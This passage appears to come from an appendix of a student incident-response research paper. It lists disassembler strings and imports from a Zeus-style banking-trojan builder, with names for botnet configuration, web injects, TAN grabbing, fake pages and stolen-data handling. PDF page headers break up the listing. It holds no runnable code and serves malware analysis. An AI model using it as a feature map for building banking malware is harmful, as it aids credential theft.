.rdata:004156BC 00000013 C IsDlgButtonChecked

.rdata:004156D2 00000012 C GetCaretBlinkTime

.rdata:004156E6 0000000F C GetShellWindow

.rdata:004156F8 00000012 C GetClipboardOwner

.rdata:0041570C 00000010 C CallWindowProcA

.rdata:0041571E 00000013 C GetWindowPlacement

.rdata:00415734 0000000F C TabbedTextOutA

.rdata:00415746 00000014 C LoadKeyboardLayoutW

.rdata:0041575C 00000009 C IsZoomed

.rdata:00415768 00000018 C CreateAcceleratorTableW

.rdata:00415782 00000009 C FillRect

.rdata:0041578E 00000013 C RealGetWindowClass

.rdata:004157A4 0000000C C ToUnicodeEx

.rdata:004157B2 00000013 C OpenWindowStationW

.rdata:004157C8 0000000D C IsCharUpperA

.rdata:004157D8 0000000F C InvalidateRect

.rdata:004157EA 0000000F C GetMenuStringW

.rdata:004157FC 00000011 C IsDialogMessageW

.rdata:00415810 0000000F C ReleaseCapture

.rdata:00415822 0000000E C GetSystemMenu

.rdata:00415832 0000000B C SetCapture

.rdata:00415840 0000000C C GrayStringA

.rdata:0041584E 0000000E C SwitchDesktop

.rdata:0041585E 00000008 C SetRect

.rdata:00415868 0000000D C GetUpdateRgn

.rdata:00415878 0000000E C GetDlgItemInt

.rdata:00415888 0000000A C LoadMenuA

.rdata:00415892 0000000B C USER32.dll

.rdata:004158A0 00000011 C CoCreateInstance

.rdata:004158B4 00000018 C CoRegisterMessageFilter

.rdata:004158CE 0000000E C OleCreateLink

.rdata:004158DE 0000000C C OleCreateEx

.rdata:004158EC 00000008 C OleLoad

.rdata:004158F6 0000000E C GetConvertStg

.rdata:00415906 00000015 C CoQueryReleaseObject

.rdata:0041591E 00000017 C CreateDataAdviseHolder

.rdata:00415938 0000001F C CoGetInterfaceAndReleaseStream

.rdata:0041595A 0000000E C WriteClassStm

.rdata:0041596A 0000001B C StgGetIFillLockBytesOnFile

.rdata:00415988 00000010 C OleBuildVersion

.rdata:0041599A 00000014 C OleRegEnumFormatEtc

.rdata:004159B0 00000016 C GetRunningObjectTable

.rdata:004159C8 00000010 C UtGetDvtd32Info

.rdata:004159DA 00000018 C OleCreateStaticFromData

.rdata:004159F4 00000012 C OleCreateFromFile

.rdata:00415A08 00000011 C OleDoAutoConvert

.rdata:00415A1C 00000013 C OpenOrCreateStream

.rdata:00415A32 00000015 C OleNoteObjectVisible

.rdata:00415A4A 00000012 C CreateAntiMoniker

.rdata:00415A5E 00000020 C OleMetafilePictFromIconAndLabel

.rdata:00415A80 00000015 C CoUnmarshalInterface

.rdata:00415A98 00000019 C OleCreateEmbeddingHelper

.rdata:00415AB4 00000016 C CoRegisterClassObject

.rdata:00415ACC 00000015 C FreePropVariantArray

.rdata:00415AE4 00000012 C OleSetAutoConvert


.rdata:00414D94 00000011 C CryptDestroyHash

.rdata:00414DA8 00000015 C AbortSystemShutdownW

.rdata:00414DC0 00000012 C GetAclInformation

.rdata:00414DD4 0000000F C CreateServiceW

.rdata:00414DE6 0000000C C CryptGenKey

.rdata:00414DF4 0000001F C LookupSecurityDescriptorPartsW

.rdata:00414E16 00000023 C ConvertAccessToSecurityDescriptorA

.rdata:00414E3C 00000018 C SetEntriesInAccessListA

.rdata:00414E56 00000015 C AbortSystemShutdownA

.rdata:00414E6E 00000011 C SetEntriesInAclW

.rdata:00414E82 00000011 C GetFileSecurityA

.rdata:00414E96 0000000E C OpenEventLogA

.rdata:00414EA6 00000012 C CryptSetHashParam

.rdata:00414EBA 00000014 C CryptSetProviderExA

.rdata:00414ED0 00000014 C QueryServiceConfigW

.rdata:00414EE6 00000014 C CryptSetProviderExW

.rdata:00414EFC 00000014 C OpenBackupEventLogW

.rdata:00414F10 0000000D C ADVAPI32.dll

.rdata:00414F20 00000014 C SendMessageTimeoutW

.rdata:00414F36 00000011 C TileChildWindows

.rdata:00414F4A 00000008 C EndTask

.rdata:00414F54 00000011 C IsDialogMessageA

.rdata:00414F68 00000013 C DdeQueryNextServer

.rdata:00414F7E 0000000E C FlashWindowEx

.rdata:00414F8E 00000017 C GetKeyboardLayoutNameA

.rdata:00414FA8 00000012 C DdeFreeDataHandle

.rdata:00414FBC 00000011 C SetThreadDesktop

.rdata:00414FD0 0000000E C GetInputState

.rdata:00414FE0 00000011 C SetKeyboardState

.rdata:00414FF4 00000011 C SetMenuItemInfoW

.rdata:00415008 0000000E C GetMenuItemID

.rdata:00415018 0000000C C GrayStringW

.rdata:00415026 0000000F C EmptyClipboard

.rdata:00415038 00000010 C CreatePopupMenu

.rdata:0041504A 0000000C C LoadStringW

.rdata:00415058 0000000F C CallMsgFilterA

.rdata:0041506A 00000010 C GetActiveWindow

.rdata:0041507C 0000000F C RegisterHotKey

.rdata:0041508E 00000010 C DialogBoxParamA

.rdata:004150A0 00000011 C ExcludeUpdateRgn

.rdata:004150B4 0000000C C GetAncestor

.rdata:004150C2 0000000C C GetSysColor

.rdata:004150D0 0000000D C GetDlgCtrlID

.rdata:004150E0 00000014 C DdeFreeStringHandle

.rdata:004150F6 0000000C C LoadStringA

.rdata:00415104 00000012 C MonitorFromWindow

.rdata:00415118 00000011 C SetDeskWallpaper

.rdata:0041512C 0000000A C DrawFrame

.rdata:00415138 00000017 C RegisterWindowMessageA

.rdata:00415B96 0000001C C CoGetCurrentLogicalThreadId

.rdata:00415BB4 00000012 C CreateItemMoniker

.rdata:00415BC8 0000000C C CoGetMalloc

.rdata:00415BD6 0000000E C WriteClassStg

.rdata:00415BE6 00000011 C ReadStringStream

.rdata:00415BFA 00000017 C CreateGenericComposite

.rdata:00415C14 00000010 C PropVariantCopy

.rdata:00415C26 00000011 C StgOpenStorageEx

.rdata:00415C3A 00000008 C OleSave

.rdata:00415C44 0000000E C IsAccelerator

.rdata:00415C54 0000000C C BindMoniker

.rdata:00415C62 00000011 C CoGetCallContext

.rdata:00415C76 00000016 C CoFreeUnusedLibraries

zse.exe: the compiler used to build the program is vc6win (Visual C++ v6).

F (dark blue) - regular function:

DialogFunc 004241D2 start 00424306 P

StartAddress 00424509

D (light green) - data:

hWnd 00429030

lpMem 00429034

hInstance 00429040

szDir 00429050

hHeap 0042A020

I (purple) - imported name:

A (dark green) - ascii string:


aEnumdesktopsa 0041C1B8 aEnumdesktopwin 0041C1C8

aEnumclipboardf 0041C1DC

aEnumchildwindo 0041C1F4 aEndtask 0041C208

aEndpaint 0041C210

aEndmenu 0041C21C aEnddialog 0041C224

aEnddeferwindow 0041C230

aEnablewindow 0041C244 aEnablescrollba 0041C254

aEnablemenuitem 0041C264

aEmptyclipboard 0041C274 aEditwndproc 0041C284

aDrawtextw 0041C290 aDrawtextexw 0041C29C

aDrawtextexa 0041C2A8

aDrawtexta 0041C2B4 aDrawstatew 0041C2C0

aDrawstatea 0041C2CC

aDrawmenubar 0041C2D8

aDrawiconex 0041C2E4

aDrawicon_0 0041C2F0

aDrawframecontr 0041C2FC aDrawframe 0041C310

aDrawfocusrect 0041C31C

aDrawedge 0041C32C aDrawcaption 0041C338

aDrawanimatedre 0041C344

aDragobject 0041C358 aDragdetect 0041C364

aDlgdirselectex 0041C370

aDlgdirselect_0 0041C380

aWaitnamedpip_0 0041FBF8

aWaitnamedpipea 0041FC08 aWaitforsingl_0 0041FC18

aWaitforsingl_1 0041FC30

aWaitformulti_0 0041FC44 aWaitformulti_1 0041FC60

aWaitfordebugev 0041FC78

aWaitcommevent 0041FC8C aVirtualunlock 0041FC9C

aVirtualquery_0 0041FCAC

aVirtualquery 0041FCBC aVirtualprote_1 0041FCCC

aVirtualprotect 0041FCE0

aVirtuallock 0041FCF0 aVirtualfreee_0 0041FCFC

aVirtualfree 0041FD0C

aVirtualalloc_0 0041FD18 aVirtualalloc 0041FD28

aVerlanguagenam 0041FD38

aVerlanguagen_0 0041FD4C

aUpdateresource 0041FD60

aUpdateresour_0 0041FD70

aUnmapviewoff_0 0041FD80 aUnlockfileex 0041FD90

aUnlockfile 0041FDA0

aUnhandledexcep 0041FDAC aTransmitcommch 0041FDC8

aTransactnamedp 0041FDDC

aToolhelp32read 0041FDF0 aTlssetvalue 0041FE0C

aTlsgetvalue 0041FE18

aTlsfree 0041FE24 aTlsalloc 0041FE2C

aThread32next_0 0041FE38

aThread32firs_0 0041FE48 aTerminatethrea 0041FE58

aTerminateproce 0041FE68

aSystemtimetotz 0041FE7C aSystemtimeto_0 0041FE9C

aSwitchtothread 0041FEB4

aSwitchtofiber 0041FEC4 aSuspendthrea_0 0041FED4

aSleepex 0041FEE4

aSleep_0 0041FEEC aSizeofresource 0041FEF4

aSignalobjectan 0041FF04

aSetupcomm 0041FF18 aSetwaitabletim 0041FF24

aSetvolumelabel 0041FF38

aSetvolumelab_0 0041FF48 aSetunhandledex 0041FF58

aSettimezoneinf 0041FF74 aSetthreadpri_0 0041FF8C

aSetthreadpri_1 0041FFA4

aSetthreadlocal 0041FFB8 aSetthreadideal 0041FFC8

aSetthreadexecu 0041FFE0

aSetthreadconte 0041FFF8

aSetthreadaffin 0042000C

aSettapepositio 00420024

aSettapeparamet 00420034 aSetsystemtimea 00420048

aSetsystemtime 00420060

aSetsystempower 00420070 aSetstdhandle 00420084

aSetprocesswork 00420094

aSetprocessshut 004200B0 aSetprocessprio 004200D0

aSetprocessaffi 004200E8

aSetprioritycla 00420100

Page 67: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

aLstrcata 004064B8

aLstrcatw 004064C4 aLstrcpya 004064D0

aLstrcpyna 004064DC

aLstrcpynw 004064E8 aLstrcpyw 004064F4

aLstrcmpia 00406500

aLstrcmpiw 0040650C aReleasemutex 00406518

aOpenmutexw 00406528

aCreatemutexw 00406534 aGetlasterror 00406544

aSetfilepoint_0 00406554

aGetmodulefil_0 00406568 aGetmodulefil_1 0040657C

aCopyfilew 00406590

aSleep 0040659C aGetmodulehandl 004065A4

aGetuserdefau_0 004065B8

aGetversionexw 004065D4

aGettimezoneinf 004065E4

aResetevent 004065FC

aUnmapviewoffil 00406608 aMapviewoffile 00406618

aCreatefilemapp 00406628

aGetfilesizeex 0040663C aGetdrivetypew 0040664C

aGetlogicaldriv 0040665C

aGetcommandline 00406670 aGetprocessheap 00406680

aGetfileattribu 00406690

aGetprocessid 004066A4 aSuspendthread 004066B4

aFreelibrary 004066C4

aOpenthread 004066D0 aResumethread 004066DC

aText 004066F8

aGetthreadconte 00406700 aCreatetimerque 00406714

aFiletimetodosd 0040672C

aFiletimetoloca 00406744 aGetfileinforma 0040675C

aWaitformultipl 00406778

aGetvolumenamef 00406790 aGetoverlappedr 004067B4

aGetenvironme_0 004067C8

aLocalfree 004067E0 aFormatmessagew 004067EC

aWtsqueryuserto 00406FF8

aUserenv_dll 0040700C aCreateenvironm 00407018

aDestroyenviron 00407030 aSeshutdownpriv 00407048

aKdL324j 00407070

aSRefererSSdata 00407084 aDllunregisters 004070BC

aDllregisterser 004070D0

aDllgetclassobj 004070E4

aDllcanunloadno 004070F8

aSyslistview32 00407108

aVersion 00407128 aSoftwareWebmon 00407138

aWmkeeperDataWm 00407160

aKwm 004071F0 aKwmS_S 004071F8

aTxt 0040720C

aSoftwareMicr_1 00407218 aEnabled 00407280

aEnabledv8 00407290

aSIeSessionCook 004072A4

aDlgdirselectco 0041C390

aDlgdirselect_1 0041C3A8 aDlgdirlistw 0041C3C0

aDlgdirlistcomb 0041C3CC

aDlgdirlistco_0 0041C3E0 aDlgdirlista 0041C3F4

aDispatchmess_1 0041C400

aDispatchmess_2 0041C414 aDialogboxparam 0041C428

aDialogboxpar_0 0041C438

aDialogboxindir 0041C448 aDialogboxind_0 0041C460

aDestroywindow 0041C478

aDestroymenu 0041C488 aDestroyicon 0041C494

aDestroycursor 0041C4A0

aDestroycaret 0041C4B0 aDestroyacceler 0041C4C0

aDeletemenu 0041C4D8

aDeferwindowpos 0041C4E4

aDefwindowprocw 0041C4F4

aDefwindowproca 0041C504

aDefmdichildpro 0041C514 aDefmdichildp_0 0041C528

aDefframeprocw 0041C53C

aDefframeproca 0041C54C aDefdlgprocw 0041C55C

aDefdlgproca 0041C568

aDdeuninitializ 0041C574 aDdeunaccessdat 0041C584

aDdesetuserhand 0041C594

aDdesetqualityo 0041C5A8 aDdereconnect 0041C5C0

aDdequerystring 0041C5D0

aDdequerystri_0 0041C5E0 aDdequerynextse 0041C5F0

aDdequeryconvin 0041C604

aDdepostadvise 0041C618 aDdenameservice 0041C628

aDdekeepstringh 0041C638

aDdeinitializew 0041C64C aDdeinitializea 0041C65C

aDdeimpersonate 0041C66C

aDdegetlasterro 0041C684 aDdegetdata 0041C694

aDdefreestringh 0041C6A0

aDdefreedatahan 0041C6B4 aDdeenablecallb 0041C6C8

aDdedisconnectl 0041C6DC

aDdedisconnect 0041C6F0 aDdecreatestrin 0041C700

aDdecreatestr_0 0041C718 aDdecreatedatah 0041C730

aDdeconnectlist 0041C744

aDdeconnect 0041C754 aDdecmpstringha 0041C760

aDdeclienttrans 0041C774

aDdeadddata 0041C78C

aDdeaccessdata 0041C798

aDdeabandontran 0041C7A8

aCreatewindowst 0041C7C0 aCreatewindow_0 0041C7D8

aCreatewindowex 0041C7F0

aCreatewindow_1 0041C800 aCreatepopupmen 0041C810

aCreatemenu 0041C820

aCreatemdiwindo 0041C82C aCreatemdiwin_0 0041C840

aCreateiconindi 0041C854

aCreateiconfrom 0041C868

aSetnamedpipe_0 00420114

aSetmessagewait 0042012C aSetmailslotinf 00420148

aSetlocaleinfow 00420158

aSetlocaleinfoa 00420168 aSetlocaltime 00420178

aSetlasterror_0 00420188

aSethandleinfor 00420198 aSethandlecount 004201B0

aSetfiletime_0 004201C0

aSetfilepoint_1 004201CC aSetfileattri_0 004201DC

aSetfileattri_1 004201F0

aSetfileapistoo 00420204 aSetfileapistoa 00420218

aSetevent_0 0042022C

aSeterrormode 00420238 aSetenvironment 00420248

aSetenvironme_0 00420260

aSetendoffile_0 00420278

aSetdefaultcomm 00420288

aSetdefaultco_0 004202A0

aSetcurrentdire 004202B8 aSetcurrentdi_0 004202D0

aSetconsolewind 004202E8

aSetconsoletitl 00420300 aSetconsoleti_0 00420314

aSetconsoletext 00420328

aSetconsolescre 00420340 aEtconsoleoutpu 0042035D

aSetconsolemode 00420370

aSetconsolecurs 00420380 aSetconsolecu_0 0042039C

aSetconsolectrl 004203B4

aSetconsolecp 004203CC aSetconsoleacti 004203DC

aEtcomputername 004203FD

aSetcomputernam 00420410 aSetcommtimeout 00420424

aSetcommstate 00420434

aSetcommmask 00420444 aSetcommconfig 00420450

aEtcommbreak 00420461

aSetcalendarinf 00420470 aSetcalendari_0 00420484

aSearchpathw 00420498

aSearchpatha 004204A4 aScrollconsoles 004204B0

aCrollconsolesc 004204CD

aRtlfillmemory 004204E8 aResumethread_0 004204F8

aResetwritewatc 00420508 aResetevent_0 00420518

aRequestwakeupl 00420524

aRequestdevicew 0042053C aRemovedirector 00420550

aRemovedirect_0 00420564

aReleasesemapho 00420578

aReleasemutex_0 0042058C

aReadprocessm_0 0042059C

aReadfilescatte 004205B0 aReadfileex 004205C0

aReadfile_0 004205CC

aReaddirectoryc 004205D8 aReadconsolew 004205F0

aReadconsoleo_0 00420600

aReadconsoleout 00420614 aReadconsoleo_1 00420630

aReadconsoleo_2 0042064C

aReadconsoleo_3 00420668

Page 68: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

aSelect_0 004072DC

aOptionSelected 004072E8 aInputValue 004072FC

aBofaAnswersS 00407310

a0Uu 00407334 aGrab_S_02u_02u 0040733C

aGrabbedDataFro 00407374

aFtp 004073A8 aPop3 004073AC

aSSS@U_U_U_UU 004073B4

a_h_64ad0625_ 004073EC a__system__64ad 00407408

aMozilla4_0Comp 0040743C

aHttp1_1 00407474 aUrlmon_dll 00407480

aObtainuseragen 0040748C

a?o 004074A4 a?i 004074A8

a?t 004074AC

aCab 004074B0

aCabinet_dll 004074B8

aFcicreate 004074C4

aFciaddfile 004074D0 aFciflushcabine 004074DC

aFcidestroy 004074EC

aBc 00407500 aBuildingBotFil 004188D0

aNotEnoughMemor 004188FC

aStaticconfig 00418920 aFailedToFindEn 00418930

aBotnet 00418998

aBotnetS 004189A0 aBotnetDefault 004189B4

aTimer_config 004189E0

aTimer_configUm 004189F0 aTimer_logs 00418A20

aTimer_logsUmsU 00418A2C

aTimer_stats 00418A58 aTimer_statsUms 00418A64

aUrl_config 00418A94

aCanTFindUrl__0 00418AA0 aUrl_configS 00418ADC

aUrl_compip 00418AF8

aCanTFindUrl_co 00418B04 aUrl_compipS 00418B40

aEncryption_key 00418B5C

aCanTFindEncryp 00418B70 aEncryption_k_0 00418BB4

aBlacklist_lang 00418BD8

aBlacklist_la_0 00418BEC aSourcePeCorrup 00418C20

a_data1 00418C4C aPercent_of_ove 00418C54

aDynamicconfig 00418C68

aUrl_loader 00418C78 String2 00418C84

aFailedToWriteO 00418C94

aBuildSucceeded 00418CD0

Str1 00418CF4

aData_before 00418CFC

aData_inject 00418D0C aData_after 00418D1C

aData_end 00418D2C

aFailedToOpenFi 00418D38 aUS 00418D84

aBadFormatOfWeb 00418D90

aSUS 00418DC4 aFailedToFind_0 00418DD8

aCanTFindUrl_lo 00418E44

aUrl_loaderS 00418E80

aCreateiconfr_0 0041C884

aCreateicon 0041C89C aCreatedialogpa 0041C8A8

aCreatedialog_0 0041C8BC

aCreatedialogin 0041C8D0 aCreatedialog_1 0041C8EC

aCreatedesktopw 0041C908

aCreatedesktopa 0041C918 aCreatecursor 0041C928

aCreatecaret 0041C938

aCreateaccelera 0041C944 aCreateaccele_0 0041C95C

aCountclipboard 0041C974

aCopyrect 0041C98C aCopyimage 0041C998

aCopyicon 0041C9A4

aCopyaccelerato 0041C9B0 aCopyaccelera_0 0041C9C8

aClosewindows_0 0041C9E0

aClosewindow 0041C9F4

aClosedesktop_0 0041CA00

aCloseclipboard 0041CA10

aClipcursor 0041CA20 aClienttoscreen 0041CA2C

aChildwindowfro 0041CA3C

aChildwindowf_0 0041CA54 aCheckradiobutt 0041CA6C

aCheckmenuradio 0041CA80

aCheckmenuitem 0041CA94 aCheckdlgbutton 0041CAA4

aCharupperw_0 0041CAB4

aCharupperbuffw 0041CAC0 aCharupperbuffa 0041CAD0

aCharuppera 0041CAE0

aChartooemw_0 0041CAEC aChartooembuffw 0041CAF8

aChartooembuffa 0041CB08

aChartooema 0041CB18 aCharprevw 0041CB24

aCharprevexa 0041CB30

aCharpreva 0041CB3C aCharnextw 0041CB48

aCharnextexa 0041CB54

aCharnexta 0041CB60 aCharlowerw 0041CB6C

aCharlowerbuffw 0041CB78

aCharlowerbuf_0 0041CB88 aCharlowera 0041CB98

aChangemenuw 0041CBA4

aChangemenua 0041CBB0 aChangedisplays 0041CBBC

aChangedispla_0 0041CBD4 aChangedispla_1 0041CBF0

aChangedispla_2 0041CC0C

aChangeclipboar 0041CC24 aCascadewindows 0041CC3C

aCascadechildwi 0041CC4C

aCallwindowproc 0041CC60

aCallwindowpr_0 0041CC70

aCallnexthookex 0041CC80

aCallmsgfilterw 0041CC90 aCallmsgfiltera 0041CCA0

aCallmsgfilter 0041CCB0

aBroadcastsyste 0041CCC0 aBroadcastsys_0 0041CCD8

aBroadcastsys_1 0041CCF0

aBringwindowtot 0041CD08 aBlockinput 0041CD1C

aBeginpaint 0041CD28

aBegindeferwind 0041CD34

aReadconsoleinp 0042067C

aReadconsolei_0 00420690 aReadconsolea 004206A4

aRaiseexception 004206B4

aQueueuserapc 004206C4 aQueryperform_0 004206D4

aQueryperforman 004206F0

aQuerydosdevice 00420708 aQuerydosdevi_0 00420718

aPurgecomm 00420728

aPulseevent 00420734 aProcess32next 00420740

aProcess32fir_0 00420750

aPreparetape 00420760 aPostqueuedcomp 0042076C

aPeeknamedpipe 00420788

aPeekconsoleinp 00420798 aPeekconsolei_0 004207AC

aOutputdebugstr 004207C0

aOutputdebugs_0 004207D4

aOpenwaitableti 004207E8

aOpenwaitable_0 004207FC

aOpensemaphorew 00420810 aOpensemaphorea 00420820

aOpenprocess_0 00420830

aOpenmutexw_0 0042083C aOpenmutexa 00420848

aOpenfilemappin 00420854

aOpenfilemapp_0 00420868 aOpenfile 0042087C

aOpeneventw 00420888

aOpeneventa 00420894 aMultibytetow_0 004208A0

aMuldiv 004208B4

aMovefilew 004208BC aMovefileexw_0 004208C8

aMovefileexa 004208D4

aMovefilea 004208E0 aModule32next 004208EC

aModule32first 004208FC

aMapviewoffilee 0042090C aMapviewoffil_0 0042091C

aLockresource 0042092C

aLockfileex 0042093C aLockfile 00420948

aLocalunlock 00420954

aLocalsize 00420960 aLocalshrink 0042096C

aLocalrealloc 00420978

aLocallock 00420988 aLocalhandle 00420994

aLocalfree_0 004209A0 aLocalflags 004209AC

aLocalfiletimet 004209B8

aLocalcompact 004209D0 aLocalalloc 004209E0

aLoadresource 004209EC

aLoadmodule 004209FC

aLoadlibraryw 00420A08

aLoadlibraryexw 00420A18

aLoadlibraryexa 00420A28 aLoadlibrarya_0 00420A38

aLcmapstringw 00420A48

aLcmapstringa 00420A58 aIsvalidlocale 00420A68

aIsvalidcodepag 00420A78

aIssystemresume 00420A88 aIsprocessorfea 00420AA0

aIsdebuggerpres 00420ABC

aIsdbcsleadbyte 00420AD0

Page 69: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

aUrl_server 00418E9C

aCanTFindUrl_se 00418EA8 aUrl_serverS 00418EE4

aBadAdvancedCon 00418F00

aAdvancedconfig 00418F3C aAdvancedconf_0 00418F4C

aBadWebFilterFo 00418F5C

aWebfilter 00418F8C aWebfilters 00418F98

aBadWebDataFilt 00418FA4

aWebdatafilter 00418FE0 aWebdatafilters 00418FF0

aWebfakes 00419000

aBadWebfakeFoun 0041900C aWebfakeUSS 00419038

aTangrabber 00419064

aBadTanGrabberR 00419070 aTangrabberUS 004190B0

aBadDnsMapFound 004190D4

aDnsmap 00419100

aFile_webinject 00419108

aFile_webinje_0 00419118

aWritingWebInje 00419140 aCfg_bin 00419174

aBuildSucceed_0 00419184

aLoadingConfigF 004191B0 aLoadingSucceed 004191F4

aFailedToLoadCo 0041921C

aConfig_txt 00419254 aTextFiles_txt 00419270

a_txt_0 00419298

aA 004192A2 aLlFiles 004192A4

a_ 004192B8

aBuilder 004192C0 aInformation 004192D0

Name 004192E8

aVira_2109 004192EC aDefault 00419304

aVersionU_U_U_U 00419320

String 004193A8 aRemovingSpywar 004193F0

aRemovingSpyw_0 00419418

Caption 00419474 aSpywareRemoved 00419490

Text 00419510

aLexx 00419584 a13024128_09_20 0041958C

aVersionU_U_U_0 004195C0

a_Pipe 00419618 aErrorS 0041962C

aOle32_dll 00419644 aShlwapi_dll 00419650

aAdvapi32_dll 0041965C

aUser32_dll 0041966C aKernel32_dll 00419678

aWritestringstr 00419688

aWriteolestg 0041969C

aWritefmtuserty 004196A8

aWriteclassstm 004196BC

aWriteclassstg 004196CC aUtgetdvtd32inf 004196DC

aUtgetdvtd16inf 004196EC

aUtconvertdvtd3 004196FC aUtconvertdvtd1 00419714

aUpdatedcomsett 0041972C

aStringfromiid 00419740 aStringfromgu_0 00419750

aStringfromclsi 00419760

aStgsettimes 00419770

aAttachthreadin 0041CD48

aArrangeiconicw 0041CD5C aAppendmenuw 0041CD74

aAppendmenua 0041CD80

aAnypopup 0041CD8C aAnimatewindow 0041CD98

aAdjustwindowre 0041CDA8

aAdjustwindow_0 0041CDBC aUnlockserviced 0041CDD0

aTrusteeaccesst 0041CDE8

aTrusteeacces_0 0041CE00 aStartservicew 0041CE18

aStartservicect 0041CE28

aStartservice_0 0041CE44 aStartservicea 0041CE60

aSettokeninform 0041CE70

aSetthreadtoken 0041CE84 aSetservicestat 0041CE94

aSetserviceobje 0041CEA8

aSetservicebits 0041CEC4

aSetsecurityinf 0041CED4

aSetsecurityi_0 0041CEE8

aSetsecurityi_1 0041CEFC aSetsecurityd_0 0041CF0C

aSetsecurityd_1 0041CF28

aSetsecurityd_2 0041CF44 aSetsecurityd_3 0041CF60

aSetprivateobje 0041CF7C

aSetnamedsecuri 0041CF98 aSetnamedsecu_0 0041CFB0

aSetnamedsecu_1 0041CFC8

aSetnamedsecu_2 0041CFE0 aSetkernelobjec 0041CFF8

aSetfilesecurit 0041D010

aSetfilesecur_0 0041D024 aSetentriesinau 0041D038

aSetentriesin_0 0041D050

aSetentriesinac 0041D068 aSetentriesin_1 0041D07C

aSetentriesin_2 0041D090

aSetentriesin_3 0041D0A8 aSetaclinformat 0041D0C0

aReverttoself 0041D0D4

aReporteventw 0041D0E4 aReporteventa 0041D0F4

aRegisterservic 0041D104

aRegisterserv_0 0041D120 aRegisterevents 0041D13C

aRegistereven_0 0041D154

aRegunloadkeyw 0041D16C aRegunloadkeya 0041D17C

aRegsetvaluew 0041D18C aRegsetvaluee_0 0041D19C

aRegsetvaluee_1 0041D1AC

aRegsetvaluea 0041D1BC aRegsetkeysecur 0041D1CC

aRegsavekeyw 0041D1E0

aRegsavekeya 0041D1EC

aRegrestorekeyw 0041D1F8

aRegrestorekeya 0041D208

aRegreplacekeyw 0041D218 aRegreplacekeya 0041D228

aRegqueryvaluew 0041D238

aRegqueryvalu_0 0041D248 aRegqueryvalu_1 0041D25C

aRegqueryvaluea 0041D270

aRegquerymultip 0041D280 aRegquerymult_0 0041D298

aRegqueryinfoke 0041D2B0

aRegqueryinfo_0 0041D2C4

aIsdbcsleadby_0 00420AE4

aIsbadwritept_0 00420AF4 aIsbadstringptr 00420B04

aIsbadstringp_0 00420B14

aIsbadreadptr_0 00420B24 aIsbadhugewrite 00420B34

aIsbadhugereadp 00420B48

aIsbadcodeptr 00420B5C aInitializecr_0 00420B6C

aInitatomtable 00420B94

aHeapwalk 00420BA4 aHeapvalidate 00420BB0

aHeapunlock 00420BC0

aHeaplock 00420BCC aHeapfree_0 00420BD8

aHeapdestroy_0 00420BE4

aHeapcreate_0 00420BF0 aHeapcompact 00420BFC

aEap32next 00420C09

aHeap32listnext 00420C14

aHeap32listfirs 00420C24

aHeap32first 00420C34

aGlobalwire 00420C40 aGlobalunlock_0 00420C4C

aGlobalunfix 00420C5C

aGlobalunwire 00420C68 aLobalsize 00420C79

aGlobalrealloc 00420C84

aGlobalmemoryst 00420C94 aGloballock_0 00420CA8

aGlobalhandle 00420CB4

aGlobalgetatomn 00420CC4 aGlobalgetato_0 00420CD8

aLobalfree 00420CED

aGlobalflags 00420CF8 aGlobalfix 00420D04

aGlobalfindatom 00420D10

aGlobalfindat_0 00420D20 aGlobaldeleteat 00420D30

aGlobalcompact 00420D44

aGlobalalloc 00420D54 aLobaladdatomw 00420D61

aGlobaladdatoma 00420D70

aGetwritewatch 00420D80 aGetwindowsdire 00420D90

aGetwindowsdi_0 00420DA8

aGetvolumeinfor 00420DC0 aGetvolumeinf_0 00420DD8

aGetversionex_0 00420DF0

aGetversionexa 00420E00 aGetversion 00420E10

aGetuserdefau_1 00420E1C aGetuserdefault 00420E34

aGettimezonei_0 00420E48

aGettimeformatw 00420E60 aGettimeformata 00420E70

aGettickcount_0 00420E80

aGetthreadtimes 00420E90

aGetthreadselec 00420EA0

aGetthreadpri_0 00420EB8

aGetthreadpri_1 00420ED0 aGetthreadlocal 00420EE4

aGetthreadcon_0 00420EF4

aGettemppathw_0 00420F08 aGettemppatha 00420F18

aGettempfilen_0 00420F28

aGettempfilen_1 00420F3C aGettapestatus 00420F50

aGettapepositio 00420F60

aGettapeparamet 00420F70

Page 70: CIS 6395 Incident Response Technologies How effective are ...kerkvlietkj.com/UCF/6395/CIS_6395_Personal_Research_Project_Kevin... · CIS 6395 Incident Response Technologies How effective

aStgopenstorage 0041977C

aStgopenstora_0 00419798 aStgopenstora_1 004197AC

aStgopenasyncdo 004197BC

aStgisstorageil 004197E0 aStgisstoragefi 004197F8

aStggetifillloc 0041980C

aStggetifilll_0 00419830 aStgcreatestora 0041984C

aStgcreatedocfi 00419860

aStgcreatedoc_0 00419880 aSetdocumentbit 00419894

aSetconvertstg 004198A8

aRevokedragdrop 004198B8 aReleasestgmedi 004198C8

aRegisterdragdr 004198DC

aReadstringstre 004198F0 aReadolestg 00419904

aReadfmtusertyp 00419910

aReadclassstm 00419924

aReadclassstg 00419934

aPropvariantcop 00419944

aPropvariantcle 00419954 aProgidfromclsi 00419968

aOpenorcreatest 00419978

aOleuninitializ 0041998C aOletranslateac 0041999C

aOlesetmenudesc 004199B4

aOlesetcontaine 004199CC aOlesetclipboar 004199E4

aOlesetautoconv 004199F4

aOlesavetostrea 00419A08 aOlesave 00419A18

aOlerun 00419A20

aOlereggetusert 00419A28 aOlereggetmiscs 00419A3C

aOleregenumverb 00419A50

aOleregenumform 00419A60 aOlequerylinkfr 00419A74

aOlequerycreate 00419A8C

aOlenoteobjectv 00419AA4 aOlemetafilepic 00419ABC

aOlelockrunning 00419ADC

aOleloadfromstr 00419AEC aOleload 00419B00

aOleisrunning 00419B08

aOleiscurrentcl 00419B18 aOleinitialize 00419B30

aOlegeticonoffi 00419B40

aOlegeticonofcl 00419B54 aOlegetclipboar 00419B68

aOlegetautoconv 00419B78 aOleflushclipbo 00419B8C

aOleduplicateda 00419BA0

aOledraw 00419BB4 aOledoautoconve 00419BBC

aOledestroymenu 00419BD0

aOlecreatestati 00419BEC

aOlecreatemenud 00419C04

aOlecreatelinkt 00419C1C

aOlecreatelin_0 00419C34 aOlecreatelinkf 00419C48

aOlecreatelin_1 00419C60

aOlecreatelinke 00419C78 aOlecreatelink 00419C88

aOlecreatefromf 00419C98

